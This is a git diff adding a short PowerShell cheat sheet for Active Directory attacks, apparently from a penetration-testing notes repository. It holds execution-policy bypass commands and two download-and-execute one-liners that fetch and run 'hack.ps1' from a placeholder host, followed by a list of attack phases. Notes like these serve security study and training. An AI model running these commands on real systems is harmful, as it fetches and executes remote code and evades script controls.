diff --git a/Active Directory/Powershell.md b/Active Directory/Powershell.md
new file mode 100644
index 0000000..b9b6e14
--- /dev/null
+++ b/Active Directory/Powershell.md	
@@ -0,0 +1,36 @@
+## Powershell  basic help commands
+
+`Get-Help`
+
+`Get-Help process`
+
+## Powershell Execution Policy bypass
+
+`powershell -ExecutionPolicy bypass`
+
+`powershell -c <cmd>`
+
+`powershell -encodedcommand $env:PSExecutionPolicyPreference="bypass"`
+
+## Powershell importing module / scripts
+
+`Import-Module <module_path`
+
+listing commands in the module
+
+`Get-Command -Module <modulename>`
+
+## Download and execute
+
+`IEX (New-Object Net.WebClient).DownloadString ('http://ip/hack.ps1')`
+
+`IEX (iwr 'http://ip/hack.ps1')`
+
+Recon 
+Domain Enum 
+Local priv 
+Admin Recon 
+Lateral Movement (while being persistant) 
+Domain 
+Admin priv 
+Cross Trust Attacks
\ No newline at end of file